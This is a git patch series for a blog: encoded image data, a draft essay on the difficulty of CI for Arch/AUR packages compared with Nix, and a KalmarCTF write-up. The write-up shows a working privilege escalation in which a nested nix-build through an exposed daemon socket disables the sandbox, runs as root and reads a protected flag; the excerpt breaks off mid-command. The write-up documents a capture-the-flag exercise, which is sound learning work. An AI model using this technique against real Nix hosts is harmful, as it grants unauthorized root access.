zS>_VOz8x15oI9FDg@g{}es5r8eq!f6dBOyRt+v|X>z>>)|NC=Os+{}xFE200{Ce~D zE$h~a-QB0dzrTv#TQ#-z``z+8Pq$@V?OJVj@7_J5mm4>2dUR=X=4CZU?-FHY<(7L$u!VVq>G{{qfGE}#{D%vKfQT-d;6W= zF0ZexU0rmt6I8D`K9}*V8kQ85L zk>SzRg-#$(g9?Juw+|1ufBfCZ#IDcL|WLak? z=k-!gPfw%2cG}wA-u?UR;uk#yU9tS^%*>eU_x9CFg9iLw&U*18LoXJz320UMoz3az z1w=)UmabjAc=46}pytWDdwaVXnb}S(X*LAyc3$yDLP%U({j({rl!-#VQ`I9?J9qg` zekV}-{)o8&+XH6Ne@g2YFFriaw)&XuZk5xON0Pk${`wl}=*T$z?8%cS&s?|=pjZ~R zGRSou=eD4rpc!k|u1&CRZf;J!wzvL&UEulN=XX#4Go5La$`xL{&;N@0+K{zTQ@zh` zOg_G&uj7$#$Bb#yj!Bv2oY>l{qO0qhRvQ@^*%a>Bp*wHhyqMhbpPy1!-gCcq?_Sd< zw-ui(4i!&{b#Y-i+u^N#TV)>`sLL#1bV2lhawzYG<2{mx-`(A<{=MgV(y3oxU+2d-(8SjMeKaD;I~C?$iPf!29XiwJFRU1Lw zjSU+N9M6B;oPIu}?ETIO{7Exs&Rmo;F)+DO<)bdBaBO;TgyDb}!_QSOcrr3FHq5iF z-qg^*uu@hhJp8)Q#;Zq;EIIM!{?WIe*TwDK<@6RbCg{q4?*0A!=g*uuK54VL`F6Hx_Oee0Q$Q+9n|gQ<&dy?FZcXlnQR_3MMaJ+!U!+vQ>wdYo zyKgRfdWtja^wDnd;+J8^ln?vOvpE?${lbL+F%glFC)N|wZ#!66n* z7K7+V)}TznqUipLdB=)Z=bU#IJq3++-MqZqUoyEzRYm25s>c+!V|}ux-->*G^IO#0 z$=R9J8niv7$Xd!TIC%2WW5?>sWHvo||7vu%{G`?2uIx09b$Hfz7M-T3tM^z_Qg$|jlL zOTDKX@$&NSy!G>Xd_Cta@8}@Ozx&l}Zl1fpxBB=}Z9P4|wAhUsHy)i9z1WR+-Gl$N z(<(Op@^0l4-H}uA=f}pNXSXW8ya?=MdEU-1pH}+%TIg*DV>`RJXJ(eAuR=2U&IqgQ zYh>H$32H_M8ilZY5O0XN(8D-`?If+V1J&Su^iV7JopT>o1TOYElP51P|IQY4NKg2RwX4I{3dwY= ziQhkOs%G#qmwvt{iZ(WLyyefY>f5qqi_+w zQ=-)FZb)=~_U6r*x?eBVL9G?g4ckiL8acPNcs|=@VQoGAhR}CVlk2U{ua&{ecl^>m zzfDMVTCk9O12`&Gm#8NvbNxEQ&ZEO#s&ZXd_J!#bSG|a zRp^wPPLalox>cuYhdaev*>i+Xm{{Q=}f8A`tf&~gQUngZ`oG2 z@9v)b@^I@aj(quz8#ZY0Cf{H_Il~{64_YQIW`5w#a8jg2Tz7Z*`)6ex&(F*ZPAc1; zb92(|cfY>Ap5Afx>gw?4QJ4N$Mn*=0hC_ql_ogjd zw%pj7eSOEN-4!1f-RZNNW11~C-ItwDCc%4}PU60O``&zed;5;O+`gmT;`$=Hq|{YZ zTC#s1d9I?Sw&~j1=+#%Pt4>Z*jmdrZ=+UBc$>Ez)dX~R=14?}hlV&jekan`U=6SN-0ma7ElVi>WCfTZqAj=>n63g6Z+) zpcS~FHvjdi>S|?8&6P)T-d|lUe!Xz0&x-kk$CHYSTE z?FKgtIy*aKuBWD^7RH7z^O@=YZ+GSAXQ2C2cAS#3EK-TvQ=z!sthcW(?ACYZzrQxk z4=8SJRFXXtm>{QS&`6CKstwCwHYUtJx({z#6wsc9-JD{IWQ?=LPo zYu>8Av!k%7zvK4|UTL!vwwhOF7$)z?`Tg;@{LU}3HWd@R|06B8G)hFMx# z=G@s)xajstX@l*Vm)pGW&oa&4@#W@?8wSqK&SJvChfDunSm-QT^}q79X1+-K&ZDU4NKUR>o4(lRnFX@%#Od$aDu|-M~@N1v&9APXGgKUu(Gns z`S|E4XplPXxtW@pTi$a=Z*A}CdQXeayuY`1^_TB%-rn7Rf4yG6NVWg;$&-n)RwV*w z_jQZw7u^ipnB=NgyZ`Su>FIX*`ugi$%h^^PIWVWiDlA zW(G~BELyyHX<3fC|Gbz-W$o?l-Dbwi*IZf`YYjT2FR*E1`1-hwvrMzQlEPC`RKkzd z`}+Fo)fPWH6POV&Yv#<8I=Z@|b^FhrIpd|m;qU94nwXdfsy1^#)#rx?2hZHP^=tL> z6Q{KzlM} zncC~i%lUWL{4AQtmz$K7)M>p1RQQ*j*j@5+QPB6LH9tRr>{;|yRZO|MHYR4ynO*ny zR4)E7na#-9c<1d`@9yqCbKro(!}AGYVbfxoKD>F8Q}+IzZP}L>fzKX3JP2x3fet1B zU66MD?~PfrX1zH(+dRgsU)K8D?5AClOX7Ez^;Va%b8b)ZI(FsMlQ>Wf#iH2qis2gL ziNN&dD}861ow8h9m{Qb zcdg8FZ<#!M@#4g*tEvdHmiyJly{D(Fg6_Te7Zp*;aq^DKIc9c;JvH z&BMzpI`3=!l@)<8R_cCpPPp~U>8@D&>+9>~LbcUrW*DyVnQ7#8Gym?LJ3A&{7M*_L z?5R^-s%mOoLQDSte!qW>-&`vZm(%V=s>x}&Me?9lP}2nUuM9ct6V{(Q7uw1tdSgxG z<{O(*PkY@Fi;aza7kTmGV)xa5_O5W6tGAnhK{(aZ#W5sgrO@tzhfNC{RE&%!Roh#< zx64#aKmS>d-6HuI&$5LJ5B~Z4cjs*_OUuZGk^iUbMlTbY`RnKutCt1xkxjCP#vN15?q7C)#CYWp~b%Z_T=TWfAX| zty^cVU%!5V!;!03r+RPSy47_0zTDf}3a?)W@t@z>S!~bJ@$uuwJGr7VGHW&{@2p7w zV{2()`>zG@U0*9W-N=}X@fdkGA&I~5Z z1ue6j>%P3Y+WmUhhYtmyp?2L{3i|r|d3kvj%h#{7Gk~_S2&?%#xORVEZM9C+77xYmW>!|SUhiV#mC`7k59)}|a^CLU~ zX;bRyO|P%7FW!3m_V)al>(;G1G;Q|zna1tA=gqY)7klcl7rX-fKw5sj{`cyvtgKV1 zpgTLK?pj~=>PqMCx7y+BbhgfWc6RpWmKK)4v`d>eZJM!pv+>^YrPCiz+Sm`t(V3at z4`eL!9;vQ0)4!#+mv{QPt=ZS>3RCW0 zUhcp1cR);xjIpWd)aqk(^UgfkxpSvity5!PAD_3c@6)XBiHF-xF7ZC2V5_h1pZ0fY zz&WN33m?u?;MllO^&N}jiDm(YyNoxOcDS5X>;ctzUZ- zXz9{dR|0RPo12@14uFWc?zQ{OU)%C`cN+KZwG|Q)V!6F`>C)EN-DQcFmUw<)`ZvjY z(#Eyy4boR+SR4Zy`~+IG3RxRu8`e$QFD&!noxOeWGoDYMKYL#(6BZVpV_z>PCMLFM z`rC&O56TvNy5fA1u_`TXnFga31L!=()2F*{i>a%tgHFF$SKC@HUv;?c)ZG5=a`~!$ zIop(fJ46Kq6{9AsTez_C>+9>u@9yj@`fIT`>2YNE$r)~sB^^Np3`7Y2BBh{>G(51p+Vr!AH8^SV(y*OM~*Bx^5)&` z?fRe+E5W~}#wNUI+oP8B`=1^i?M}T`{OXG4y5FE1=-=%MT^BRc`+29Z`o74t)6;Z8 ztAD=Vdje`NXJlwhw=*ty;Gj3#Ebq>WFXunr-Ce%(m0A8ho4mQxrcDDC@kTFq*Zww( z-dAJ!`qI+wn0eu%lS~*^GhSKxa26=Vc3f&PY_MdA3o`gu8o9encY1RD+gn?OHiicW zPu7jv@?y1_?>w8xkl1O{rp4qMm%a*_S$cOzVYByi(E7E%prN~^#tI4xP85mjL?~!9 z-uU+R_R~w{QCl(&ruru&EVyKU9JEV0{O-D#ok~9>JNx_pr~UNw^vwDH?{ChP6@hE2 zzP|c$PFJS;na43TP)kCgBdA-h;UdGkiOoM&=G@%Wnwpw=^39F^zh1BB+P*brXVIGz z6P538(NtG&FMV?((4-bL=;i2te_w6tHBn(<<<0ZHd?`67d7yGf)z_?vPqVVKi|Y#> zoHfwvouV5(?ew%8HzJnS_w6owdup!lUZ+;BMXWDbSy^>dR9bYSwsdUGy*({6GxK8g zwt#m`5~`BmZf=tT2d5N+3?s{g!#^?~JbLov$iIKT^H=tt-n3~`(2Cx#udXIfoH+65 zEm3)S@DP;czEvw`I&M5Sy-xq+$&*H}E5E&&`C#$!PoF=hUi*FC{=Z0c+2Jf-h5&tJNHdFQKZ>*MVYeg&PA zB5jn?ai{-uup{S$9?L1LkaA~{#2SV-Y!lr5o-B8aetfL==6U=7XPB6o_wSl-p{LiE znUSG!Mva}FecFr}8l?w5zTf|!%W8hCw|95$tu39}H#$2yCPdEPw#{t%y6EkBoO!qV zzkl>Ty|?=N60Pc2S5`KqT|9i~kjwq$H4hK5>P5HIOwbBm#sgX+`1<;KdC*di+uL%b zx%v41J@NUNdwUz_y4#(?>N{R-OFb=C^}SPjCqo%yhT~x!aD%Mn%@w8%LIcA@fBxLKVuc2% zO|_yg|K1+K81v%d;=I4UvrHD2%j~yd{$S7GX3_&%7{KD#(a+bA$dEVj@k*IRYuBEA zcYpu+mQO!ECO>=p_;A?zxU0!ddEWQi zc%@mkzuo`;pZ4Z^OO~k2Ea8zh^9k6!ukP=x(6v#aQ}$iiU7oKeJ!$e}(8A=&>c@^9 zYkGZra?S+9W1x|ms_Q589x}9f9peFKW)7!w84MfP3z!`2EElV4>*?wF+?2E`(Fngg zXYSmcUvy)4g%s@enq2X|*vQBz~bhX;<1xz+#vR4!Y&Qgg??udlC%-};xFoUFW~ z?)9~`lcVCJqNF~5|DG*}KKJtdR$C57KOcHZXz+vwF3#UQq*KvUUrrRtPD z?;aiP_L7dVt@$zGx5vuB#cqW!=NKlpJt*Vl=6-xh_w~Hg;NZ*rmOK?RZL7Cw-2AzJ z+K&Lqg5qM~7<+Z~|lzB<^d0Ie+yUswuQT4z?B zEDT)$8l!i0anXoP2n`50u=V?&y?;Q9&Z^vdBoue}>c{UpvozY@-#_v6>HCvs&(=Pr z^SPOwe~OWVc(QBD!i5jje?Oc&dGgHl>-D8=t4vl0E@s>7o^t+Joy(_l*B3p6WOApS zE4dzsGZ;QOq2<@p+k3ND+I))EhFRwM^A=cvCR$>us=vR}-C+xw5MR2x=I5uFUlsl9 ze_Ql3tbg~t=*kx zR%I+IuzzI7aP!HXQ}LiezNx8cirNaHDi_iG3tCUslrKD(HB~EgM|y?4ZI#N3v)|v} z*I#k=|DVtPOL;Ej-{0qZzWk);wkNWA`jyLtSsYhvee5N`vhbV;0|$!%ivzES-1g%6 zvs~-;RDb8&TlMwOL}hocD}9fT_a}dOaWSEXQ|maaeR#0+#F;ZscC7>NS6;ewY2uR; z6Ps@3Tv*@;y7%Gx*NYb~dfiwio1?tQNKgK89_~ zCm7E9o%DV4_HCqxM~73o)#uNjZ|d*=qvRD<$Z%&hqmPdd%jk)dQIeJHQVc-rt_TKy^~o(7&5NovT`v~gXe+2H+k(K}cSQZx)2weRK+E<~v?D1JCe!*$iw`W{*nhy&6#g1YHD4JZl6Bg zy&ANrS3RP9bK2PmKfk^Ozc-b=jatWVm6@5z#d+xR<;$Qob~Dzm*N@(m!URNu^`5?I!UTb7^XKaq z7l6k2K$EVZ6_nR=ZrI2RFIv3V_2SvxSMHoU=O^-abNYEP8J6!aFT1DhefaR6gI7m+S;{q_ip3r>guq?ZoCIMSv+?FP#|OnVYu2P(5*8P4fAQjlKd6GL z`18ZCsJQs$LhVW?h968891mDc*&PKyTap|FY>qH}nA9QJz&I&kuc&En#gb*q9z8iZ z*(*KVGp&GKWd6~=#h*TZ2A%hEXJ;{c>gj1uwGQ97AyNJ94XDBW>GS8MyPieQyaT!# zy`5jaPN>1%-CbEtjqUxty^GmBfA07h81Qe(tY!u9Ap{B>hLv0o{5xyD2X466G|SCa z^CiRHCFvI!L0c$i7$&os<=;CK+qQPC?z6MA+wa%?_FZ+qy{+xg`Sb55E7(|BNr7sb znjAUB@;vXRPs|Me7C%$qXaa4U<8TtRVcHO*#H-Ty%Yk9q6_ZzoUteDj+WR(R#*CWa zl9G}uRu1e9YooUxx_VV~Z`IdFddUwDwQ_KA9h#~g-u3tG$;s+di(FYh`o60Znc^N? zECA^)umnzWVUAFms5Z%=R-mEnipi?8r>E<0EP8q>|KIMmHZ~q!-o&INrsU+u{EpQ= zK0O-0ysJ8YS4$*=wu?V__^|QKo1B!?R7GQB;mF8HqrbMAnw?fte|-oLn(~{eV-d*t z0_;|oK+ARO-d|q^vW08<5#bge&;eiF;`(|m{mxp@-Bi@10NOCwq;Tc!-rG{GoX@Hj z6?ob>3bYs%@*l_)NsH%Sya1Gcm`a)yIxacoGW1PK*sIOpoF&wxAacfKsiI*e7btQMKoNAk`oP(gLxoBR^Q!f!}k(J>CXEkk&bS zSPSBWCd_C2&@`(BmI|8qWf|Un_<#CgbiiZ*mO!5EAOCNDqR3FR(vzb}LBj!5mmOJt z%l%-LIfLj5PmV=bCNn*d`B$(1(;HzC$I(T+2iX4aFTXo$R*Qlc?|+Y`kCz$p7)~r! zQ-r38rU1EB3>(-lI4YfG$Ozgj&~hr6L4nC(g9{Vmo@HqWRkA${TmEV!h;|cyY|LLpaSwHm5YE|H9nqvfN5&W3bKmBOAOQMifl$gK3 zpPD@}wh^Doqt^Ms?K;t8*6{2{iF|c#mRQpdwexn|C*C(qTMdtNfuco94BjGo?fGmA zR=V)4%UpMb%NV4XFD!hfDB`eA<-@-UHyfq{+9Ky>fLsSjDlRMC*c(_I*fe7F;=eDpf6b)f z?CWyEfsJeWLi>Mj&Sx<2t2lxT1b4|<90g<^hb=wd^sT?S+?Zk46`!SDGM)$iZdLeW z*kHckW&zwYO#v3O7*^GaZK;)9niPZobTvFSVG_vem3yaOhgAt|-o!g%F} zM#Xxz10t;_U)lZN%w#$}#*=YE!=aX(PWivKjzT5-`H#gnoZ|F2s5l)CK`gsQU|?YIboFyt=akR{ E0HdwE?f?J) literal 0 HcmV?d00001 diff --git a/content/posts/packaging-is-extremely-hard/index.md b/content/posts/packaging-is-extremely-hard/index.md new file mode 100644 index 0000000..0a99540 --- /dev/null +++ b/content/posts/packaging-is-extremely-hard/index.md @@ -0,0 +1,256 @@ ++++ +date = "2024-01-27" +draft = true +path = "/blog/packaging-is-extremely-hard" +tags = ["build-systems", "arch-linux", "linux", "nix"] +title = "Packaging is extremely hard, or, why building AUR packages in CI is a nightmare" ++++ + +Packaging on a traditional distribution is challenging to say the least, and I +haven't seen any coherent descriptions of *why* hermetic build systems like Nix +eliminate an entire category of needing to think about certain things. Recently +a friend mentioned she was considering setting up a CI service for some AUR +packages by a trivial cron job, whereas my reaction to the idea of CI for Arch +packages is "that would take a month of work to do correctly". + +Let's explore the inherent complexity in writing a CI service for basically any +binary distro; picking on Arch Linux is only because it is what I have +experience with, though they tend to be especially fast and loose with inherent +complexity. One could argue that Arch in particular is the Go of distros, since +it ignores a lot of hard things in order to ship a working distro, similarly to +[how Go famously solves complexity by ignoring it][golang]. This is not about +factionalism; it is about the choices of where distro maintainers have spent +their energy, and ignoring complexity is something that has its place. + +Arch is known for having a large user maintained repository of non-reviewed +community-written packaging for most anything under the sun called the AUR. +This is a blessing and a curse, because Arch is extremely a binary distro. +Pretty much this entire post would apply to anyone maintaining a binary +repository for another distribution, except perhaps the part of building +packages maintained by other people in CI. + +[golang]: https://fasterthanli.me/articles/i-want-off-mr-golangs-wild-ride + +[rebuild-conds]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#The_workflow +[rebuild-detector]: https://github.com/maximbaz/rebuild-detector + +## "Rebuild conditions are indeterminate", or, why C++ people are always talking about ABI + +If you are a downstream consumer of an official binary package, such as being +an AUR packager, there is not really any obvious notice that you should rebuild +your package due to dependency updates, besides, perhaps, [rebuild-detector] +and upgrading your system regularly. + +The way that release management is done at Arch Linux is that maintainers +updating libraries go and [ping all their colleagues][soname-bump] when their +upstream changed their software so it is no longer binary-compatible +("ABI-compatible"), represented by a "soname bump", e.g. changing the file name +`libc.so.5` -> `libc.so.6`. This is not terribly unusual among distros. + +However, it's perfectly possible that packages break their ABI without updating +their soname, since most changes to C header files besides adding things will +break ABI in theory, for instance, changing `#define` constants or other such +things. So, if upstream is being impolite, they can cause bugs at any time, and +blatant changes can be caught by things like [abi-checker], though they don't +necessarily form part of the official process for Arch. + +[abi-checker]: https://lvc.github.io/abi-compliance-checker/ + +[soname-bump]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#Run_sogrep_on_identified_soname_change + +When packages are rebuilt without being updated, this is done by incrementing +`pkgrel` in the PKGBUILD, which is achieved automatically in the official repos +with `pkgctl build --rebuild` ([man page][pkgctl-build]) of the affected +packages. For example, for a version `0.20.10-1`, incrementing `pkgrel` would +produce a version `0.20.10-2`, which is uploaded to staging as well as pushed +to the package's own Git repo with `pkgctl release`. + +After all the builds are made, `pkgctl db move` is invoked to move all the +packages over. + +

+ +[pkgctl-build]: https://man.archlinux.org/man/pkgctl-build.1.en + +### Atomicity? Is that like a criticality incident? + +{% image(name="./antifa-demon-core.png", colocated=true) %} +an antifaschistische aktion sticker with a demon core in the middle, +"ausgerutscht, trotzdem da" on top and "kernphysiker antifa" on the bottom +{% end %} + + + +If the official repos operate by coordination between all the packagers, with a +staging area to atomically release rebuilds, it follows that AUR packagers can +expect that official repos can and will change at any time without notification +(unless one goes and looks at the development bug tracker). + + + +[arch-arm]: https://wiki.archlinux.org/title/Arch_Linux_Archive + +This is a relatively reasonable process for a distro that doesn't fully +automate everything and even one that does, but it is kind of a problem if you +aren't an official maintainer working in the official repos, since you aren't +in the notification list. + +Note also that the information that the AUR itself has on packages is not +sufficient to send emails about this either; this isn't the fault of the +Arch developers. + +However, the upshot of this is that if one is using an AUR package maintained +by someone else, there is no guarantee anyone has tried building it against the +latest versions of the official repos, and it is in fact also impossible to +know what versions it was successfully built against. A local build of an AUR +package can get arbitrarily out of sync with the official repos and it is not +easily possible to reconstruct the state of all the repos that went into +building it. + +Stuff randomly breaking due to repositories using the time of day as a software +version pinning mechanism is not just an AUR problem: it is much, much worse on +third-party binary repositories. For instance, even though [archzfs] is by far +one of the best executed third party repositories, in large part on account of +them running a CI service, it still can be out of time with the versions of the +kernel. + +[archzfs]: https://github.com/archzfs/archzfs + +However, the instance where third party repositories get *really* out of sync +with things is for things like Manjaro which have repositories delayed by two +weeks relative to Arch for "stability". This doesn't work out very well. + +## The source-build-source cycle + +For any package, a CI system that fully automates the packaging workflow needs +to be able to increment `pkgrel` on any dependency updates and trigger a +rebuild automatically. This is stored in the package source files: the CI +system has to be able to push to the sources automatically. + +This also means that a CI system building someone else's AUR packages needs to +*fork any packages it builds*, since it must be able to update `pkgrel` based +on its own detection of upstream changes, without worrying about the AUR +maintainer doing it. + +### Building someone else's stuff? Better reconcile it with automated local changes automatically + +However, the even worse corrolary of the above is if the other maintainer +*does* update `pkgrel`, since then you have to reconcile your own maintained +`pkgrel` and ensure that it strictly increases even with the maintainer's +changes. + +Another cause of needing to rebuild AUR sourced packages is the AUR package +itself changing, perhaps because upstream updated it and the AUR packager +updated their packaging. In that case, one has to discard local changes and +hope that versions strictly increased so pacman will install the new one. + +## Weightless! In the package manager! Loopy dependency graphs + +Debian ([documentedly so][debian-loopy]) and most other binary distros don't +have any tooling preventing packages forming circular build dependency graphs. +The most trivial one that exists in most any binary distribution is the C++ +compiler, which is itself likely a build dependency of the C++ compiler since +both clang and gcc are written in C++. + +How does one get the first compiler? In most distros, the answer is +"someone built it manually from somewhere and shoved it in /usr/local and then +built the first compiler package using some crimes". However, that path is, for +the most part, not documented or clearly reproducible. It is the typical state +of affairs to have the *distro repository itself* be a ball of inscrutable +mutable state. + +In NixOS it's [a tarball of compilers that's built with Nix and is occasionally +updated][nixos-bootstrap-tools], and will in the future [be rooted in a 256 +byte binary][nixos-minimal-bootstrap] after which everything is built from +source, which is what Guix also does. There's a bunch more information about +the efforts to bootstrap from nearly nothing at [bootstrappable.org], as well +as [on the Guix blog][fsb]. + +[bootstrappable.org]: https://bootstrappable.org/ + +[fsb]: https://guix.gnu.org/en/blog/2023/the-full-source-bootstrap-building-from-source-all-the-way-down/ +[nixos-bootstrap-tools]: https://github.com/nixos/nixpkgs/blob/d0efa70d8114756ca5aeb875b7f3cf6d61543d62/pkgs/stdenv/linux/make-bootstrap-tools.nix#L237-L256 +[nixos-minimal-bootstrap]: https://github.com/nixos/nixpkgs/blob/3dcd819caa03c848a9a06964857e12e4b789239e/pkgs/os-specific/linux/minimal-bootstrap/default.nix + +[debian-loopy]: https://wiki.debian.org/CircularBuildDependencies + +## Package tests? p--package integration t-tests?? + +So you want to write an integration test for your package on Arch Linux. That's +too bad, because there's not a testing framework, because there are not tests. +Packages can run the software's testsuite, but there is no officially supported +integration testing solution. + +# Software engineering fixes this + +I have spilled a thousand words on how traditional binary distros (that [are +not Fedora][fedora-ci]) spend a significant amount of labour doing rebuilds +largely by hand, with scripts on their local machines, coordinating amongst +maintainers. Most packages are built on developer machines, though [never on +Fedora][fedora-ci2] and only [sometimes on Debian][debian-ci], and thus cannot +necessarily be trusted to not be contaminated by the squishy mutable stuff that +happens on dev machines. Even though they are typically built in chroots, the +environment is not controlled. + +[debian-ci]: https://ci.debian.net/ + +I have addressed how packages require manually poking `pkgrel` every time a +rebuild is necessary, and how the need for rebuilds affects downstream +builders. This is, incidentally, [largely still true on +Fedora][fedora-updates]. + +The (pessimistic but sound) way to manage rebuilds is to just recompile every +downstream when a single bit of any dependency changes. This is the approach +used by Nix and it trades a significant but not unaffordably large (for a big +distro) amount of computer time in a build cluster for not having to think +about any of this. ABI breaks cannot affect the distribution because everything +was built against the exact same libraries, together. + +A Nix-like hermetic build system doesn't have a concept of `pkgrel`, because +packages are just what is in the single monorepo source tree on a given commit. +There is nothing wrong with the other approach of multiple repositories and +repository metadata that doesn't expose a single history, but it would be +useful to be able to cleanly ensure that a group of machines have exactly the +same packages on them as of some epoch, say. + +Facebook has made a tool for RPM distributions that builds OS images with +Buck2, called [Antlir]. This takes snapshots of repositories and builds OS +images with a hermetic build system, such that they receive the exact same +result every time. + +[Antlir]: https://facebookincubator.github.io/antlir/docs/ + +ABI breaks can *also* not break downstream consumers of `nixpkgs`, because Nix +builds out-of-tree stuff exactly the same using the same version set as +anything else: unlike every binary distribution, the distribution packages are +not special, and building out-of-tree stuff will never randomly break due to +ABI changes. + +NixOS has a robust and widely used (1040 of them) [integration +test][nixos-integration-tests] system, like Fedora, testing most parts of the +system and [gating repository updates][nixos-gating] like Fedora Bodhi. + +[nixos-gating]: https://status.nixos.org/ +[nixos-integration-tests]: https://nix.dev/tutorials/nixos/integration-testing-using-virtual-machines.html +[fedora-updates]: https://docs.fedoraproject.org/en-US/fesco/Updates_Policy/ +[fedora-ci2]: https://discussion.fedoraproject.org/t/report-from-the-reproducible-builds-hackfest-during-flock-2023/87469 +[fedora-ci]: https://docs.fedoraproject.org/en-US/ci/ From c12a6dd830460406440ab94184c6fd2d6307826c Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Mon, 18 Mar 2024 13:39:01 -0700 Subject: [PATCH 06/10] reproducible pwning --- content/posts/reproducible-pwning-writeup.md | 295 +++++++++++++++++++ 1 file changed, 295 insertions(+) create mode 100644 content/posts/reproducible-pwning-writeup.md diff --git a/content/posts/reproducible-pwning-writeup.md b/content/posts/reproducible-pwning-writeup.md new file mode 100644 index 0000000..12a402c --- /dev/null +++ b/content/posts/reproducible-pwning-writeup.md @@ -0,0 +1,295 @@ ++++ +date = "2024-03-16" +draft = false +path = "/blog/reproducible-pwning-writeup" +tags = ["ctf", "nix"] +title = "KalmarCTF: Reproducible Pwning writeup" ++++ + +I was making memes in the CTF room until someone told me Nix showed up +on a CTF, and well. It doesn't take that much to tempt me. + +Reproducible Pwning is a challenge written by +[niko](https://hachyderm.io/@nrab), which involves a NixOS VM you're supposed +to root. The build user is not notably privileged. + +There is a flag in `/data` which is mounted from the host via some means. That +directory is only readable by root. + +There is a patch to the Nix evaluator. Interesting: + +```patch +diff --git a/src/libutil/config.cc b/src/libutil/config.cc +index 37f5b50c7..fd824ee03 100644 +--- a/src/libutil/config.cc ++++ b/src/libutil/config.cc +@@ -1,3 +1,4 @@ ++#include "logging.hh" + #include "config.hh" + #include "args.hh" + #include "abstract-setting-to-json.hh" +@@ -17,6 +18,16 @@ Config::Config(StringMap initials) + + bool Config::set(const std::string & name, const std::string & value) + { ++ if (name.find("build-hook") != std::string::npos ++ || name == "accept-flake-config" ++ || name == "allow-new-privileges" ++ || name == "impure-env") { ++ logWarning({ ++ .msg = hintfmt("Option '%1%' is too dangerous, skipping.", name) ++ }); ++ return true; ++ } ++ + bool append = false; + auto i = _settings.find(name); + if (i == _settings.end()) { +``` + +The machine is configured with the following NixOS module, which I pulled out +of the included flake. The rest of the flake is normal stuff. There are a few +things that stand out to me: + +- sudo is disabled, polkit is disabled: we are probably not looking for some + setuid exploit +- There are some *extremely* nonstandard Nix config settings being applied + +```nix +({pkgs, ...}: { + nixpkgs.hostPlatform = "x86_64-linux"; + nixpkgs.overlays = [ + (final: prev: { + # JADE: likely vulnerable to puck's CVE, but I doubt that is the bug cuz they + # added a patch and there is other funny business up. + nix = final.nixVersions.nix_2_13.overrideAttrs { + patches = [./nix.patch]; + # JADE: due to broken integration tests, almost certainly + doInstallCheck = false; + }; + }) + ]; + + # JADE: no interesting setuid binaries + security = { + sudo.enable = false; + polkit.enable = false; + }; + + systemd.services.nix-daemon.serviceConfig.EnvironmentFile = let + # JADE: here is the wacky part of the config. + # This exposes the Nix daemon socket inside the sandbox (this is mostly + # never the case unless using recursive-nix). So we are going to + # be running a nix build inside a nix build to do something. + sandbox = pkgs.writeText "nix-daemon-config" '' + extra-sandbox-paths = /tmp/daemon=/nix/var/nix/daemon-socket/socket + ''; + # JADE: I don't know what this does, so we are going to be reading some C++Nix + # source code. But it sure smells like running the build as root. + buildug = pkgs.writeText "nix-daemon-config" '' + build-users-group = + ''; + in + # JADE: Sets additional config files to only the nix daemon. This is + # documented in the Nix manual. + pkgs.writeText "env" '' + NIX_USER_CONF_FILES=${sandbox}:${buildug} + ''; +}) +``` + +Here is the rest of the module which is uninteresting: + +{% codesample(desc="`boring-module.nix`") %} +```nix +{ ... }: { + # JADE: what the heck is this? It seems like some kind of kernel-problems + # storage thing. Later found out this is nothing. + environment.etc."systemd/pstore.conf".text = '' + [PStore] + Unlink=no + ''; + + users.users.root.initialHashedPassword = "x"; + users.users.user = { + isNormalUser = true; + initialHashedPassword = ""; + group = "user"; + }; + users.groups.user = {}; + + system.stateVersion = "22.04"; + + services.openssh = { + enable = true; + settings.PermitRootLogin = "no"; + }; + + # JADE: save some image size + environment.noXlibs = true; + documentation.man.enable = false; + documentation.doc.enable = false; + fonts.fontconfig.enable = false; + + nix.settings = { + # JADE: this option has no interesting security impact, just whether you + # can build during evaluation phase. + allow-import-from-derivation = false; + experimental-features = ["flakes" "nix-command" "repl-flake" "no-url-literals"]; + }; +} +``` +{% end %} + +So, to sum up: +- We have a Nix daemon socket in the sandbox. +- We are running builds with some weird group. +- Several config settings that make trusted users effectively root are + blocked by the patch. Interesting. We probably become a trusted user then. + +So like, let's run some build. + +```nix +let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a +'' +``` + +This gives me: + +``` +this derivation will be built: + /nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv +building '/nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +``` + +Hm. Boring, I was expecting to be root already. + +But, why is there a socket in there? Let's try invoking another build inside +our build, maybe? And, based on the assumption we must be trusted user (since I +can't think of any other reason interaction with the bind-mounted socket would +be different from inside the sandbox), let's try just turning off the sandbox +in the inner build and see what happens? + +```nix +let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; + # dont worry about the contents quite yet + hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix); +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a + nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax} +'' +``` + +and `stage2.nix`: + +```nix +let + pkgs = import (builtins.getEnv "PKGS") { }; +in +pkgs.runCommand "meow2" { } '' + echo MEOW2 + id -a +'' +``` + +This outputs: + +``` +this derivation will be built: + /nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv +building '/nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +this derivation will be built: + /nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv +building '/nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv'... +MEOW2 +uid=0(root) gid=0(root) groups=0(root) +``` + +Welp, I am root. Change stage 2 to `cat /data/*` and we have a flag: + +``` +[user@nixos:~]$ cat >stage1.nix <<-'EOF' +> let + nixpkgs = builtins.fetchTarball { + url = 